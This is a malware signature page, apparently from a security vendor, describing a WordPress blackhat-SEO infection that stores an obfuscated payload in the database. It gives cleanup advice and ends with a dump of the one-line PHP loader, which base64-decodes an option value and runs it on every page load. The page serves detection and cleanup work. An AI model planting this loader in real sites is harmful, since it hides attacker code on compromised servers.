Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.dbload.001

php.spam-seo.dbload.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
This malware is WordPress specific, relying not only on the filesystem to install itself, but the database (wp_options), where the final payload is stored obfuscated.

Affecting

Any vulnerable WordPress based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files looking for the suspicious usage of add_action and get_option functions, and check your WordPress database. Also, you can contact Sucuri to help you with the infection removal.

Dump


add_action('init', create_function('', implode("n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));